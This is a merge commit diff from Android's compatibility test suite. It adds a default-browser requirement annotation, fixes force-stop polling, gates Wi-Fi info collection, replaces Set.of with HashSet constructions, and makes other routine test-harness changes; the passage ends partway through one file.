Merge "Do not use sample flags in queueInputBuffer" into main am: 3dd7db05d3
Original change: https://android-review.googlesource.com/c/platform/cts/+/2846340
Change-Id: Ifd8818d2ea2b74f1ce8e248177da4104b49ab06a
Signed-off-by: Automerger Merge Worker <android-build-automerger-merge-worker@system.gserviceaccount.com>
diff --git a/apps/CtsVerifier/res/values/strings.xml b/apps/CtsVerifier/res/values/strings.xml
index 62423bb..b8c3b64 100644
--- a/apps/CtsVerifier/res/values/strings.xml
+++ b/apps/CtsVerifier/res/values/strings.xml
@@ -2395,7 +2395,7 @@
particular ringer mode states works properly.
</string>
<string name="ringer_mode_pass_test">These tests are handled by CTS.</string>
- <string name="test_sound_effects">Test touch sound</string>
+ <string name="test_sound_effects">Test Tap & click sounds</string>
<string name="test_vibrate_notification">Test vibrate notification</string>
<string name="test_vibrate_ringer">Test vibrate ringer</string>
<string name="test_access_ringer_mode">Test access ringer mode</string>
@@ -2403,7 +2403,7 @@
<string name="test_volume_dnd_affected_stream">Test volume change</string>
<string name="test_mute_dnd_affected_streams">Test mute streams</string>
<string name="test_ringer_manager">Test RingtoneManager</string>
- <string name="enable_sound_effects">Please enable touch sound in Sound settings.</string>
+ <string name="enable_sound_effects">Please enable Tap & click sounds in Sound settings.</string>
<string name="attention_ready">I\'m done</string>
<string name="attention_filter_any">Please enable \"Do not disturb\" by tapping the Quick Settings tile.</string>
<string name="attention_filter_all">Please disable \"Do not disturb\" by tapping the Quick Settings tile.</string>
diff --git a/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java b/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java
new file mode 100644
index 0000000..8537764
--- /dev/null
+++ b/common/device-side/bedstead/harrier/common/src/main/java/com/android/bedstead/harrier/annotations/RequireHasDefaultBrowser.java
@@ -0,0 +1,37 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.bedstead.harrier.annotations;
+
+import static com.android.bedstead.harrier.UserType.INSTRUMENTED_USER;
+
+import com.android.bedstead.harrier.UserType;
+import java.lang.annotation.ElementType;
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+
+/**
+ * Requires the user has a default browser
+ */
+@Target({ElementType.METHOD, ElementType.ANNOTATION_TYPE, ElementType.TYPE})
+@Retention(value = RetentionPolicy.RUNTIME)
+public @interface RequireHasDefaultBrowser {
+ /** Which user type should we check the browser for. */
+ UserType forUser() default INSTRUMENTED_USER;
+
+ FailureMode failureMode() default FailureMode.SKIP;
+}
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
index 23919f3..e0f53be 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/BedsteadJUnit4.java
@@ -61,6 +61,7 @@
import com.google.auto.value.AutoAnnotation;
import com.google.common.collect.ImmutableMap;
+import com.google.common.collect.ImmutableSet;
import org.junit.Test;
import org.junit.rules.TestRule;
@@ -693,7 +694,7 @@
}
if (enterprisePolicy.delegatedScopes().length > 0) {
- Set<String> newDelegatedScopes = Set.of(enterprisePolicy.delegatedScopes());
+ ImmutableSet<String> newDelegatedScopes = ImmutableSet.copyOf(enterprisePolicy.delegatedScopes());
if (!delegatedScopes.isEmpty()
&& !delegatedScopes.containsAll(newDelegatedScopes)) {
throw new IllegalStateException("Cannot merge multiple policies which define "
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
index bb57dda9..1e6bdbe 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/DeviceState.java
@@ -100,6 +100,7 @@
import com.android.bedstead.harrier.annotations.RequireFeatureFlagEnabled;
import com.android.bedstead.harrier.annotations.RequireFeatureFlagNotEnabled;
import com.android.bedstead.harrier.annotations.RequireFeatureFlagValue;
+import com.android.bedstead.harrier.annotations.RequireHasDefaultBrowser;
import com.android.bedstead.harrier.annotations.RequireHeadlessSystemUserMode;
import com.android.bedstead.harrier.annotations.RequireInstantApp;
import com.android.bedstead.harrier.annotations.RequireLowRamDevice;
@@ -1294,6 +1295,18 @@
continue;
}
+ if (annotation instanceof RequireHasDefaultBrowser) {
+ RequireHasDefaultBrowser requireHasDefaultBrowser =
+ (RequireHasDefaultBrowser) annotation;
+ UserReference user =
+ resolveUserTypeToUser(requireHasDefaultBrowser.forUser());
+
+ checkFailOrSkip("User: " + user + " does not have a default browser",
+ TestApis.packages().defaultBrowserForUser(user) != null,
+ requireHasDefaultBrowser.failureMode());
+ continue;
+ }
+
if (annotation instanceof RequireTelephonySupport) {
RequireTelephonySupport requireTelephonySupport =
(RequireTelephonySupport) annotation;
@@ -1407,6 +1420,7 @@
}
annotations.addAll(description.getAnnotations());
+ annotations.sort(BedsteadJUnit4::annotationSorter);
checkAnnotations(annotations);
@@ -4016,14 +4030,14 @@
.findFirst();
if (account.isPresent()) {
- accounts(onUser).setFeatures(account.get(), Set.of(features));
+ accounts(onUser).setFeatures(account.get(), new HashSet<>(Arrays.asList(features)));
mAccounts.put(key, account.get());
TestApis.devicePolicy().calculateHasIncompatibleAccounts();
return account.get();
}
AccountReference createdAccount = accounts(onUser).addAccount()
- .features(Set.of(features))
+ .features(new HashSet<>(Arrays.asList(features)))
.add();
mCreatedAccounts.add(createdAccount);
mAccounts.put(key, createdAccount);
@@ -4168,7 +4182,7 @@
private boolean trySetUserRestrictionWithDeviceOwner(String restriction) {
ensureHasDeviceOwner(FailureMode.FAIL,
/* isPrimary= */ false, EnsureHasDeviceOwner.HeadlessDeviceOwnerType.NONE,
- /* affiliationIds= */ Set.of(), /* type= */ DeviceOwnerType.DEFAULT,
+ /* affiliationIds= */ new HashSet<>(), /* type= */ DeviceOwnerType.DEFAULT,
EnsureHasDeviceOwner.DEFAULT_KEY, new TestAppProvider().query());
RemotePolicyManager dpc = deviceOwner();
@@ -4186,7 +4200,7 @@
private boolean trySetUserRestrictionWithProfileOwner(UserReference onUser, String restriction) {
ensureHasProfileOwner(onUser,
/* isPrimary= */ false, /* isParentInstance= */ false,
- /* affiliationIds= */ Set.of(), EnsureHasProfileOwner.DEFAULT_KEY,
+ /* affiliationIds= */ new HashSet<>(), EnsureHasProfileOwner.DEFAULT_KEY,
new TestAppProvider().query());
RemotePolicyManager dpc = profileOwner(onUser);
@@ -4204,7 +4218,7 @@
private boolean tryClearUserRestrictionWithDeviceOwner(String restriction) {
ensureHasDeviceOwner(FailureMode.FAIL,
/* isPrimary= */ false, EnsureHasDeviceOwner.HeadlessDeviceOwnerType.NONE,
- /* affiliationIds= */ Set.of(), /* type= */ DeviceOwnerType.DEFAULT,
+ /* affiliationIds= */ new HashSet<>(), /* type= */ DeviceOwnerType.DEFAULT,
EnsureHasDeviceOwner.DEFAULT_KEY, new TestAppProvider().query());
RemotePolicyManager dpc = deviceOwner();
@@ -4222,7 +4236,7 @@
private boolean tryClearUserRestrictionWithProfileOwner(UserReference onUser, String restriction) {
ensureHasProfileOwner(onUser,
/* isPrimary= */ false, /* isParentInstance= */ false,
- /* affiliationIds= */ Set.of(), EnsureHasProfileOwner.DEFAULT_KEY,
+ /* affiliationIds= */ new HashSet<>(), EnsureHasProfileOwner.DEFAULT_KEY,
new TestAppProvider().query());
RemotePolicyManager dpc = profileOwner(onUser);
diff --git a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
index c519b7a..a63932d 100644
--- a/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
+++ b/common/device-side/bedstead/harrier/src/main/java/com/android/bedstead/harrier/Policy.java
@@ -439,11 +439,11 @@
existingAnnotations.length + 1);
newAnnotations[newAnnotations.length - 1] = ensureHasDevicePolicyManagerRoleHolder(
roleHolderUser, /* isPrimary= */ true);
- return Set.of(annotation,
+ return new HashSet<>(Arrays.asList(annotation,
new DynamicParameterizedAnnotation(
annotation.annotationType().getSimpleName() + "_DPMRH",
newAnnotations
- ));
+ )));
};
}
@@ -894,7 +894,7 @@
for (Annotation annotation : annotations) {
shadowingAnnotations.addAll(
- sReverseShadowMap.getOrDefault(annotation.annotationType(), Set.of()));
+ sReverseShadowMap.getOrDefault(annotation.annotationType(), new HashSet<>()));
}
annotations.removeIf(a -> shadowingAnnotations.contains(a.annotationType()));
diff --git a/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java b/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
index e998853..d5dc680 100644
--- a/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
+++ b/common/device-side/bedstead/harrier/src/test/java/com/android/bedstead/harrier/DeviceStateTest.java
@@ -54,6 +54,7 @@
import android.app.ActivityManager;
import android.app.admin.DevicePolicyManager;
import android.app.contentsuggestions.ContentSuggestionsManager;
+import android.app.role.RoleManager;
import android.os.Build;
import android.os.Bundle;
import android.os.UserManager;
@@ -108,6 +109,7 @@
import com.android.bedstead.harrier.annotations.RequireFeatureFlagNotEnabled;
import com.android.bedstead.harrier.annotations.RequireFeatureFlagValue;
import com.android.bedstead.harrier.annotations.RequireGmsBuild;
+import com.android.bedstead.harrier.annotations.RequireHasDefaultBrowser;
import com.android.bedstead.harrier.annotations.RequireHeadlessSystemUserMode;
import com.android.bedstead.harrier.annotations.RequireInstantApp;
import com.android.bedstead.harrier.annotations.RequireLowRamDevice;
@@ -1638,4 +1640,9 @@
assertThat(TestApis.content().suggestions().defaultServiceEnabled(sDeviceState.additionalUser())).isTrue();
}
+ @Test
+ @RequireHasDefaultBrowser
+ public void requireHasDefaultBrowser_onDifferentUser_defaultContentSuggestionsServiceIsEnabled() {
+ assertThat(TestApis.roles().getRoleHolders(RoleManager.ROLE_BROWSER)).isNotEmpty();
+ }
}
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
index 0a4930f..26b2127 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/accounts/AccountBuilder.java
@@ -25,6 +25,7 @@
import java.io.IOException;
import java.util.ArrayList;
+import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;
import java.util.UUID;
@@ -102,7 +103,7 @@
* Add features to the account.
*/
public AccountBuilder addFeatures(String... feature) {
- mFeatures.addAll(Set.of(feature));
+ mFeatures.addAll(new HashSet<>(Arrays.asList(feature)));
return this;
}
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
index 361de58..7ba1c55 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Package.java
@@ -716,16 +716,20 @@
PackageManager userPackageManager =
TestApis.context().androidContextAsUser(user).getPackageManager();
-
+ boolean shouldCheckPreviousProcess = runningProcess() != null;
// In most cases this should work first time, however if a user restriction has been
// recently removed we may need to retry
+
+ int previousPid = shouldCheckPreviousProcess ? runningProcess().pid() : -1;
+
Poll.forValue("Application flag", () -> {
userActivityManager.forceStopPackage(mPackageName);
- return userPackageManager.getPackageInfo(mPackageName, PackageManager.GET_META_DATA)
- .applicationInfo.flags;
- })
- .toMeet(flag -> (flag & FLAG_STOPPED) == FLAG_STOPPED)
+ return userPackageManager.getPackageInfo(mPackageName,
+ PackageManager.GET_META_DATA)
+ .applicationInfo.flags;
+ }).toMeet(flag -> !shouldCheckPreviousProcess || (flag & FLAG_STOPPED) == FLAG_STOPPED
+ || previousPid != runningProcess().pid())
.errorOnFail("Expected application flags to contain FLAG_STOPPED ("
+ FLAG_STOPPED + ")")
.await();
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
index d6cc3ae..7bce3ca 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/packages/Packages.java
@@ -19,12 +19,15 @@
import static android.Manifest.permission.INSTALL_PACKAGES;
import static android.Manifest.permission.INTERACT_ACROSS_USERS;
import static android.Manifest.permission.INTERACT_ACROSS_USERS_FULL;
+import static android.content.Intent.ACTION_VIEW;
import static android.content.pm.PackageInstaller.EXTRA_PACKAGE_NAME;
import static android.content.pm.PackageInstaller.EXTRA_STATUS;
import static android.content.pm.PackageInstaller.EXTRA_STATUS_MESSAGE;
import static android.content.pm.PackageInstaller.STATUS_FAILURE;
import static android.content.pm.PackageInstaller.STATUS_SUCCESS;
import static android.content.pm.PackageInstaller.SessionParams.MODE_FULL_INSTALL;
+import static android.content.pm.PackageManager.MATCH_ALL;
+import static android.content.pm.PackageManager.MATCH_DEFAULT_ONLY;
import static android.os.Build.VERSION.SDK_INT;
import static android.os.Build.VERSION_CODES.R;
@@ -39,7 +42,9 @@
import android.content.pm.FeatureInfo;
import android.content.pm.PackageInstaller;
import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
import android.content.res.Resources;
+import android.net.Uri;
import android.os.Build;
import android.util.Log;
@@ -71,7 +76,9 @@
import java.util.Arrays;
import java.util.Collection;
import java.util.HashSet;
+import java.util.List;
import java.util.Objects;
+import java.util.Optional;
import java.util.Set;
import java.util.stream.Collectors;
@@ -727,4 +734,53 @@
public Package launcher() {
return find(TestApis.ui().device().getLauncherPackageName());
}
+
+ /**
+ * Finds the browser assigned to handle browsing intents by default for selected user.
+ *
+ * @return the package for the default browser if there is one, null otherwise.
+ */
+ @SuppressWarnings("NewApi")
+ @Experimental
+ public Package defaultBrowserForUser(UserReference user) {
+ ResolveInfo resolvedActivity;
+ List<ResolveInfo> possibleActivities;
+ Intent toResolve = new Intent(ACTION_VIEW, Uri.parse("http://"));
+
+ PackageManager pm = TestApis.context()
+ .androidContextAsUser(user)
+ .getPackageManager();
+
+ if (Versions.meetsMinimumSdkVersionRequirement(Versions.T)) {
+ possibleActivities = pm.queryIntentActivities(toResolve,
+ PackageManager.ResolveInfoFlags.of(MATCH_ALL));
+ resolvedActivity = pm.resolveActivity(toResolve,
+ PackageManager.ResolveInfoFlags.of(MATCH_DEFAULT_ONLY));
+ } else {
+ possibleActivities = pm.queryIntentActivities(toResolve, MATCH_ALL);
+ resolvedActivity = pm.resolveActivity(toResolve, MATCH_DEFAULT_ONLY);
+ }
+
+ Set<String> possibleBrowserPackageName = possibleActivities.stream()
+ .map(Packages::extractPackageName)
+ .filter(Objects::nonNull)
+ .collect(Collectors.toSet());
+
+ Log.e("SettingTest", "possibleBrowserPackageNames: " + possibleBrowserPackageName);
+
+ String resolvedBrowserPackageName = extractPackageName(resolvedActivity);
+ if (resolvedBrowserPackageName == null
+ || !possibleBrowserPackageName.contains(resolvedBrowserPackageName)) {
+ return null;
+ }
+
+ return find(resolvedBrowserPackageName);
+ }
+
+ private static String extractPackageName(@Nullable ResolveInfo nullableInfo) {
+ return Optional.ofNullable(nullableInfo)
+ .map(resolveInfo -> resolveInfo.activityInfo)
+ .map(activityInfo -> activityInfo.packageName)
+ .orElse(null);
+ }
}
diff --git a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
index 80edf68..0162fc0 100644
--- a/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
+++ b/common/device-side/bedstead/nene/src/main/java/com/android/bedstead/nene/users/Users.java
@@ -59,6 +59,7 @@
import java.time.Duration;
import java.util.ArrayList;
+import java.util.Arrays;
import java.util.Collection;
import java.util.Comparator;
import java.util.HashMap;
@@ -338,7 +339,7 @@
private UserType managedProfileUserType() {
UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
managedProfileMutableUserType.mName = MANAGED_PROFILE_TYPE_NAME;
- managedProfileMutableUserType.mBaseType = Set.of(UserType.BaseType.PROFILE);
+ managedProfileMutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.PROFILE));
managedProfileMutableUserType.mEnabled = true;
managedProfileMutableUserType.mMaxAllowed = -1;
managedProfileMutableUserType.mMaxAllowedPerParent = 1;
@@ -349,7 +350,7 @@
UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
managedProfileMutableUserType.mName = SYSTEM_USER_TYPE_NAME;
managedProfileMutableUserType.mBaseType =
- Set.of(UserType.BaseType.FULL, UserType.BaseType.SYSTEM);
+ new HashSet<>(Arrays.asList(UserType.BaseType.FULL, UserType.BaseType.SYSTEM));
managedProfileMutableUserType.mEnabled = true;
managedProfileMutableUserType.mMaxAllowed = -1;
managedProfileMutableUserType.mMaxAllowedPerParent = -1;
@@ -359,7 +360,7 @@
private UserType secondaryUserType() {
UserType.MutableUserType managedProfileMutableUserType = new UserType.MutableUserType();
managedProfileMutableUserType.mName = SECONDARY_USER_TYPE_NAME;
- managedProfileMutableUserType.mBaseType = Set.of(UserType.BaseType.FULL);
+ managedProfileMutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.FULL));
managedProfileMutableUserType.mEnabled = true;
managedProfileMutableUserType.mMaxAllowed = -1;
managedProfileMutableUserType.mMaxAllowedPerParent = -1;
diff --git a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
index a2a4192..3d14dce 100644
--- a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
+++ b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/packages/PackageTest.java
@@ -21,6 +21,7 @@
import static com.google.common.truth.Truth.assertThat;
+import static org.junit.Assume.assumeNotNull;
import static org.testng.Assert.assertThrows;
import android.content.Context;
@@ -357,6 +358,24 @@
}
@Test
+ public void forceStop_whenRestartableApp_doesNotLoopEndlessly() {
+ final int previousId = TestApis.packages().launcher().runningProcess().pid();
+ TestApis.packages().launcher().forceStop();
+ assertThat(TestApis.packages().launcher().runningProcess().pid()).isNotEqualTo(previousId);
+ }
+
+ @Test
+ public void forceStop_whenNoRunningProcess_doesNotThrowException() {
+ final Package notRunningPackage = TestApis.packages().installedForUser().stream()
+ .filter(aPackage -> aPackage.runningProcess() == null)
+ .findFirst()
+ .get();
+ assumeNotNull(notRunningPackage);
+
+ notRunningPackage.forceStop();
+ }
+
+ @Test
@EnsureHasSecondaryUser
@RequireRunNotOnSecondaryUser
public void installedOnUsers_doesNotIncludeUserWithoutPackageInstalled() throws Exception {
diff --git a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
index d05e091..603bdaa 100644
--- a/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
+++ b/common/device-side/bedstead/nene/src/test/java/com/android/bedstead/nene/users/UserTypeTest.java
@@ -22,6 +22,8 @@
import org.junit.runner.RunWith;
import org.junit.runners.JUnit4;
+import java.util.Arrays;
+import java.util.HashSet;
import java.util.Set;
@RunWith(JUnit4.class)
@@ -50,7 +52,7 @@
@Test
public void baseType_returnsBaseType() {
UserType.MutableUserType mutableUserType = new UserType.MutableUserType();
- mutableUserType.mBaseType = Set.of(UserType.BaseType.FULL);
+ mutableUserType.mBaseType = new HashSet<>(Arrays.asList(UserType.BaseType.FULL));
UserType userType = new UserType(mutableUserType);
assertThat(userType.baseType()).containsExactly(UserType.BaseType.FULL);
diff --git a/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java b/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
index 9c813c1..47caa4df 100644
--- a/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
+++ b/common/device-side/bedstead/remoteaccountauthenticator/src/main/java/com/android/bedstead/remoteaccountauthenticator/RemoteAccountAuthenticator.java
@@ -31,6 +31,8 @@
import java.io.IOException;
import java.util.ArrayList;
+import java.util.Arrays;
+import java.util.HashSet;
import java.util.Set;
import java.util.stream.Collectors;
import java.util.stream.Stream;
@@ -42,9 +44,9 @@
public final class RemoteAccountAuthenticator extends TestAppInstance {
// TODO(263350665): Query account types from xml
- private static final Set<String> ACCOUNT_TYPES = Set.of(
+ private static final Set<String> ACCOUNT_TYPES = new HashSet<>(Arrays.asList(
"com.android.bedstead.remoteaccountauthenticator.account"
- );
+ ));
private static final String REMOTE_ACCOUNT_AUTHENTICATOR_PACKAGE_NAME =
"com.android.RemoteAccountAuthenticator";
diff --git a/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java b/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
index 558215e..6ed639d 100644
--- a/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
+++ b/common/device-side/bedstead/testapp/src/testapps/main/java/com/android/bedstead/testapp/TestAppAccountAuthenticator.java
@@ -26,6 +26,7 @@
import java.util.ArrayList;
import java.util.Arrays;
+import java.util.HashSet;
import java.util.Set;
/**
@@ -132,7 +133,7 @@
hasFeatures = false;
} else {
hasFeatures = Arrays.asList(accountManager.getUserData(account, "features")
- .split(",")).containsAll(Set.of(features));
+ .split(",")).containsAll(new HashSet<>(Arrays.asList(features)));
}
Bundle result = new Bundle();
diff --git a/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java b/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
index 45726b8..c99d9a2 100644
--- a/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
+++ b/common/device-side/device-info/src/com/android/compatibility/common/deviceinfo/ConnectivityDeviceInfo.java
@@ -15,9 +15,13 @@
*/
package com.android.compatibility.common.deviceinfo;
+import android.content.pm.PackageManager;
+
import android.net.wifi.ScanResult;
import android.net.wifi.WifiManager;
+import android.os.Build;
+
import android.util.Log;
import com.android.compatibility.common.util.DeviceInfoStore;
@@ -63,12 +67,20 @@
return "";
}
+ private boolean hasWifi() {
+ return getContext().getPackageManager().hasSystemFeature(PackageManager.FEATURE_WIFI);
+ }
+
@Override
protected void collectDeviceInfo(DeviceInfoStore store) throws Exception {
- try {
- collectWifiStandards(store);
- } catch (IOException e) {
- Log.w(LOG_TAG, "Failed to collect WiFi standards", e);
+ if (hasWifi()) {
+ if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
+ try {
+ collectWifiStandards(store);
+ } catch (IOException e) {
+ Log.w(LOG_TAG, "Failed to collect WiFi standards", e);
+ }
+ }
}
}
diff --git a/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java
new file mode 100644
index 0000000..4d95158
--- /dev/null
+++ b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation.java
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+package com.google.android.interactive.steps.enterprise.launcher;
+
+import com.android.interactive.Automation;
+import com.android.interactive.annotations.AutomationFor;
+
+@AutomationFor("com.google.android.interactive.steps.enterprise.launcher"
+ + ".DoesLauncherDefaultConfigurationContainPhoneShortcutStep")
+public class DoesLauncherDefaultConfigurationContainPhoneShortcutStepAutomation implements Automation<Boolean> {
+ @Override
+ public Boolean automate() throws Exception {
+ return true;
+ }
+}
diff --git a/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java
new file mode 100644
index 0000000..d79cc75
--- /dev/null
+++ b/common/device-side/interactive/automation/src/main/java/com/google/android/interactive/steps/enterprise/launcher/DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation.java
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+package com.google.android.interactive.steps.enterprise.launcher;
+
+import com.android.interactive.Automation;
+import com.android.interactive.annotations.AutomationFor;
+
+@AutomationFor("com.google.android.interactive.steps.enterprise.launcher"
+ + ".DoesLauncherDefaultConfigurationContainSmsShortcutStep")
+public class DoesLauncherDefaultConfigurationContainSmsShortcutStepAutomation implements Automation<Boolean> {
+ @Override
+ public Boolean automate() throws Exception {
+ return true;
+ }
+}
diff --git a/common/device-side/interactive/src/main/java/com/android/interactive/Step.java b/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
index abe25f1..faf347d 100644
--- a/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
+++ b/common/device-side/interactive/src/main/java/com/android/interactive/Step.java
@@ -22,6 +22,8 @@
import static com.android.interactive.Automator.AUTOMATION_FILE;
import android.graphics.PixelFormat;
+import android.os.Handler;
+import android.os.Looper;
import android.util.Log;
import android.view.Gravity;
import android.view.LayoutInflater;
@@ -247,27 +249,32 @@
* Adds a button to the interaction prompt.
*/
protected void addButton(String title, Runnable onClick) {
- Button btn = new Button(TestApis.context().instrumentedContext());
- btn.setText(title);
- btn.setOnClickListener(v -> onClick.run());
+ // Push to UI thread to avoid animation issues when adding the button
+ new Handler(Looper.getMainLooper()).post(() -> {
+ Button btn = new Button(TestApis.context().instrumentedContext());
+ btn.setText(title);
+ btn.setOnClickListener(v -> onClick.run());
- GridLayout layout = mInstructionView.findViewById(R.id.buttons);
- layout.addView(btn);
+ GridLayout layout = mInstructionView.findViewById(R.id.buttons);
+ layout.addView(btn);
+ });
}
/**
* Adds small button with a single up/down arrow, used for moving the text box to the
* bottom of the screen in case it covers some critical area of the app
*/
-
protected void addSwapButton() {
- Button btn = new Button(TestApis.context().instrumentedContext());
- // up/down arrow
- btn.setText("\u21F5");
- btn.setOnClickListener(v -> swap());
+ // Push to UI thread to avoid animation issues when adding the button
+ new Handler(Looper.getMainLooper()).post(() -> {
+ Button btn = new Button(TestApis.context().instrumentedContext());
+ // up/down arrow
+ btn.setText("\u21F5");
+ btn.setOnClickListener(v -> swap());
- GridLayout layout = mInstructionView.findViewById(R.id.buttons);
- layout.addView(btn);
+ GridLayout layout = mInstructionView.findViewById(R.id.buttons);
+ layout.addView(btn);
+ });
}
/**
diff --git a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
index aa87d2a..377e089 100644
--- a/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
+++ b/hostsidetests/appcompat/compatchanges/src/com/android/cts/appcompat/CompatChangesSelinuxTest.java
@@ -17,15 +17,12 @@
package com.android.cts.appcompat;
import static com.google.common.truth.Truth.assertThat;
-import static org.junit.Assert.assertEquals;
-import static org.junit.Assert.assertTrue;
import android.compat.cts.CompatChangeGatingTestCase;
